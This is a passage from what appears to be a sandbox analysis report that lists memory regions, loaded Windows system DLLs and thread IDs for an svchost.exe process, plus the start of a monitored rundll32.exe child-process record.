filename = ""
Region:
id = 1790
start_va = 0x7ff6c6fdc000
end_va = 0x7ff6c6fddfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fdc000"
filename = ""
Region:
id = 1791
start_va = 0x7ff6c6fde000
end_va = 0x7ff6c6fdffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fde000"
filename = ""
Region:
id = 1792
start_va = 0x7ff6c6fe0000
end_va = 0x7ff6c70dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6c6fe0000"
filename = ""
Region:
id = 1793
start_va = 0x7ff6c70e0000
end_va = 0x7ff6c7102fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6c70e0000"
filename = ""
Region:
id = 1794
start_va = 0x7ff6c7103000
end_va = 0x7ff6c7104fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7103000"
filename = ""
Region:
id = 1795
start_va = 0x7ff6c7105000
end_va = 0x7ff6c7105fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7105000"
filename = ""
Region:
id = 1796
start_va = 0x7ff6c7108000
end_va = 0x7ff6c7109fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7108000"
filename = ""
Region:
id = 1797
start_va = 0x7ff6c710e000
end_va = 0x7ff6c710ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c710e000"
filename = ""
Region:
id = 1798
start_va = 0x7ff6c7e00000
end_va = 0x7ff6c7e0cfff
entry_point = 0x7ff6c7e00000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1799
start_va = 0x7ffb22f00000
end_va = 0x7ffb23089fff
entry_point = 0x7ffb22f00000
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 1800
start_va = 0x7ffb23090000
end_va = 0x7ffb230bffff
entry_point = 0x7ffb23090000
region_type = mapped_file
name = "wscsvc.dll"
filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")
Region:
id = 1801
start_va = 0x7ffb23de0000
end_va = 0x7ffb23e22fff
entry_point = 0x7ffb23de0000
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 1802
start_va = 0x7ffb282b0000
end_va = 0x7ffb28334fff
entry_point = 0x7ffb282b0000
region_type = mapped_file
name = "audioses.dll"
filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")
Region:
id = 1803
start_va = 0x7ffb2d730000
end_va = 0x7ffb2d743fff
entry_point = 0x7ffb2d730000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1804
start_va = 0x7ffb2d750000
end_va = 0x7ffb2d847fff
entry_point = 0x7ffb2d750000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1805
start_va = 0x7ffb2e4a0000
end_va = 0x7ffb2e4b0fff
entry_point = 0x7ffb2e4a0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1806
start_va = 0x7ffb33330000
end_va = 0x7ffb333aefff
entry_point = 0x7ffb33330000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1807
start_va = 0x7ffb333f0000
end_va = 0x7ffb334c5fff
entry_point = 0x7ffb333f0000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1808
start_va = 0x7ffb360e0000
end_va = 0x7ffb360edfff
entry_point = 0x7ffb360e0000
region_type = mapped_file
name = "cmintegrator.dll"
filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll")
Region:
id = 1809
start_va = 0x7ffb360f0000
end_va = 0x7ffb36125fff
entry_point = 0x7ffb360f0000
region_type = mapped_file
name = "wcmcsp.dll"
filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll")
Region:
id = 1810
start_va = 0x7ffb36130000
end_va = 0x7ffb361c7fff
entry_point = 0x7ffb36130000
region_type = mapped_file
name = "wcmsvc.dll"
filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll")
Region:
id = 1811
start_va = 0x7ffb362a0000
end_va = 0x7ffb362b9fff
entry_point = 0x7ffb362a0000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1812
start_va = 0x7ffb362c0000
end_va = 0x7ffb362d5fff
entry_point = 0x7ffb362c0000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1813
start_va = 0x7ffb362e0000
end_va = 0x7ffb36327fff
entry_point = 0x7ffb362e0000
region_type = mapped_file
name = "dhcpcore6.dll"
filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")
Region:
id = 1814
start_va = 0x7ffb36330000
end_va = 0x7ffb36460fff
entry_point = 0x7ffb36330000
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1815
start_va = 0x7ffb364c0000
end_va = 0x7ffb3651cfff
entry_point = 0x7ffb364c0000
region_type = mapped_file
name = "dhcpcore.dll"
filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")
Region:
id = 1816
start_va = 0x7ffb36550000
end_va = 0x7ffb3655afff
entry_point = 0x7ffb36550000
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 1817
start_va = 0x7ffb36560000
end_va = 0x7ffb36567fff
entry_point = 0x7ffb36560000
region_type = mapped_file
name = "ksuser.dll"
filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll")
Region:
id = 1818
start_va = 0x7ffb36570000
end_va = 0x7ffb36680fff
entry_point = 0x7ffb36570000
region_type = mapped_file
name = "audiosrv.dll"
filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")
Region:
id = 1819
start_va = 0x7ffb36950000
end_va = 0x7ffb36ad2fff
entry_point = 0x7ffb36950000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1820
start_va = 0x7ffb36ae0000
end_va = 0x7ffb36b51fff
entry_point = 0x7ffb36ae0000
region_type = mapped_file
name = "mmdevapi.dll"
filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")
Region:
id = 1821
start_va = 0x7ffb36ce0000
end_va = 0x7ffb36cf0fff
entry_point = 0x7ffb36ce0000
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1822
start_va = 0x7ffb37240000
end_va = 0x7ffb373eafff
entry_point = 0x7ffb37240000
region_type = mapped_file
name = "wevtsvc.dll"
filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")
Region:
id = 1823
start_va = 0x7ffb373f0000
end_va = 0x7ffb373fafff
entry_point = 0x7ffb373f0000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1824
start_va = 0x7ffb37400000
end_va = 0x7ffb37408fff
entry_point = 0x7ffb37400000
region_type = mapped_file
name = "nrpsrv.dll"
filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll")
Region:
id = 1825
start_va = 0x7ffb37410000
end_va = 0x7ffb37447fff
entry_point = 0x7ffb37410000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1826
start_va = 0x7ffb37450000
end_va = 0x7ffb37459fff
entry_point = 0x7ffb37450000
region_type = mapped_file
name = "lmhsvc.dll"
filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")
Region:
id = 1827
start_va = 0x7ffb37470000
end_va = 0x7ffb37487fff
entry_point = 0x7ffb37470000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1828
start_va = 0x7ffb37a60000
end_va = 0x7ffb37a72fff
entry_point = 0x7ffb37a60000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1829
start_va = 0x7ffb386b0000
end_va = 0x7ffb386d6fff
entry_point = 0x7ffb386b0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1830
start_va = 0x7ffb38a70000
end_va = 0x7ffb38aa1fff
entry_point = 0x7ffb38a70000
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1831
start_va = 0x7ffb38ab0000
end_va = 0x7ffb38b31fff
entry_point = 0x7ffb38ab0000
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1832
start_va = 0x7ffb38c60000
end_va = 0x7ffb38c82fff
entry_point = 0x7ffb38c60000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1833
start_va = 0x7ffb38d90000
end_va = 0x7ffb38d9bfff
entry_point = 0x7ffb38d90000
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 1834
start_va = 0x7ffb38f90000
end_va = 0x7ffb38f9bfff
entry_point = 0x7ffb38f90000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1835
start_va = 0x7ffb391c0000
end_va = 0x7ffb39217fff
entry_point = 0x7ffb391c0000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1836
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1837
start_va = 0x7ffb39350000
end_va = 0x7ffb3936efff
entry_point = 0x7ffb39350000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1838
start_va = 0x7ffb393b0000
end_va = 0x7ffb39457fff
entry_point = 0x7ffb393b0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1839
start_va = 0x7ffb395b0000
end_va = 0x7ffb3960cfff
entry_point = 0x7ffb395b0000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1840
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1841
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1842
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1843
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1844
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1845
start_va = 0x7ffb39d40000
end_va = 0x7ffb39d50fff
entry_point = 0x7ffb39d40000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1846
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1847
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1848
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1849
start_va = 0x7ffb3a410000
end_va = 0x7ffb3a453fff
entry_point = 0x7ffb3a410000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1850
start_va = 0x7ffb3a460000
end_va = 0x7ffb3a4b3fff
entry_point = 0x7ffb3a460000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1851
start_va = 0x7ffb3a630000
end_va = 0x7ffb3a7f0fff
entry_point = 0x7ffb3a630000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1852
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1853
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1854
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1855
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1856
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1857
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1858
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1859
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1860
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1861
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1862
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1863
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1864
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1865
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1866
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Thread:
id = 187
os_tid = 0x94c
Thread:
id = 188
os_tid = 0x43c
Thread:
id = 189
os_tid = 0xff0
Thread:
id = 190
os_tid = 0xfc4
Thread:
id = 191
os_tid = 0x168
Thread:
id = 192
os_tid = 0x7d0
Thread:
id = 193
os_tid = 0x128
Thread:
id = 194
os_tid = 0xfc
Thread:
id = 195
os_tid = 0x2cc
Thread:
id = 196
os_tid = 0x264
Thread:
id = 197
os_tid = 0x140
Thread:
id = 198
os_tid = 0x244
Thread:
id = 199
os_tid = 0x134
Thread:
id = 200
os_tid = 0x118
Thread:
id = 201
os_tid = 0x3b8
Thread:
id = 202
os_tid = 0x3b4
Thread:
id = 203
os_tid = 0x3b0
Thread:
id = 204
os_tid = 0x3ac
Thread:
id = 205
os_tid = 0x3a8
Thread:
id = 206
os_tid = 0x338
Thread:
id = 209
os_tid = 0x51c
Thread:
id = 210
os_tid = 0x45c
Thread:
id = 211
os_tid = 0xb30
Thread:
id = 212
os_tid = 0x794
Thread:
id = 213
os_tid = 0xdf4
Thread:
id = 233
os_tid = 0xebc
Process:
id = "13"
image_name = "rundll32.exe"
filename = "c:\\windows\\syswow64\\rundll32.exe"
page_root = "0xa0b1000"
os_pid = "0xac4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "8"
os_parent_pid = "0xc84"
cmd_line = "C:\\Windows\\syswow64\\rundll32.exe"
cur_dir = "C:\\Windows\\system32\\"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1879
start_va = 0xc0000
end_va = 0xdffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1880
start_va = 0xe0000
end_va = 0xe1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1881
start_va = 0xf0000
end_va = 0x103fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1882
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1883
start_va = 0x150000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1884
start_va = 0x190000
end_va = 0x193fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1885
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1886
start_va = 0x910000
end_va = 0x921fff
entry_point = 0x910000
region_type = mapped_file
name = "rundll32.exe"
filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")
Region:
id = 1887
start_va = 0x930000
end_va = 0x492ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 1888
start_va = 0x77190000
end_va = 0x77308fff
entry_point = 0x77190000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1889
start_va = 0x7f640000
end_va = 0x7f662fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f640000"
filename = ""
Region:
id = 1890
start_va = 0x7f66a000
end_va = 0x7f66afff
entry_point = 0x0
region_type = private
name = "private_0x000000007f66a000"
filename = ""
Region:
id = 1891
start_va = 0x7f66c000
end_va = 0x7f66efff
entry_point = 0x0
region_type = private
name = "private_0x000000007f66c000"
filename = ""
Region:
id = 1892
start_va = 0x7f66f000
end_va = 0x7f66ffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f66f000"
filename = ""
Region:
id = 1893
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1894
start_va = 0x7fff0000
end_va = 0x7dfb3d30ffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1895
start_va = 0x7dfb3d310000
end_va = 0x7ffb3d30ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007dfb3d310000"
filename = ""
Region:
id = 1896
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1897
start_va = 0x7ffb3d4d2000
end_va = 0x7ffffffeffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffb3d4d2000"
filename = ""
Region:
id = 1899
start_va = 0x1b0000
end_va = 0x1b1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1900
start_va = 0x1c0000
end_va = 0x1e7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1901
start_va = 0x200000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1902
start_va = 0x5ca00000
end_va = 0x5ca72fff
entry_point = 0x5ca00000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1903
start_va = 0x5ca80000
end_va = 0x5cacefff
entry_point = 0x5ca80000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1904
start_va = 0x360000
end_va = 0x45ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 1905
start_va = 0x5c9f0000
end_va = 0x5c9f7fff
entry_point = 0x5c9f0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1906
start_va = 0xc0000
end_va = 0xcffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1907
start_va = 0x210000
end_va = 0x2cdfff
entry_point = 0x210000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1908
start_va = 0x74190000
end_va = 0x74220fff
entry_point = 0x74190000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 1909
start_va = 0x75f20000
end_va = 0x76095fff
entry_point = 0x75f20000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1910
start_va = 0x76bc0000
end_va = 0x76caffff
entry_point = 0x76bc0000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1911
start_va = 0x7f540000
end_va = 0x7f63ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f540000"
filename = ""
Region:
id = 1912
start_va = 0xd0000
end_va = 0xd3fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1913
start_va = 0xe0000
end_va = 0xe2fff
entry_point = 0xe0000
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\SysWOW64\\sfc.dll" (normalized: "c:\\windows\\syswow64\\sfc.dll")
Region:
id = 1914
start_va = 0x736e0000
end_va = 0x736fafff
entry_point = 0x736e0000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1915
start_va = 0x73dd0000
end_va = 0x73ddefff
entry_point = 0x73dd0000
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\SysWOW64\\sfc_os.dll" (normalized: "c:\\windows\\syswow64\\sfc_os.dll")
Region:
id = 1916
start_va = 0x73de0000
end_va = 0x73e46fff
entry_point = 0x73de0000
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv")
Region:
id = 1917
start_va = 0x73e50000
end_va = 0x73e66fff
entry_point = 0x73e50000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")
Region:
id = 1918
start_va = 0x73e70000
end_va = 0x740e7fff
entry_point = 0x73e70000
region_type = mapped_file
name = "aclayers.dll"
filename = "\\Windows\\AppPatch\\AcLayers.dll" (normalized: "c:\\windows\\apppatch\\aclayers.dll")
Region:
id = 1919
start_va = 0x74230000
end_va = 0x74288fff
entry_point = 0x74230000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1920
start_va = 0x74290000
end_va = 0x74299fff
entry_point = 0x74290000
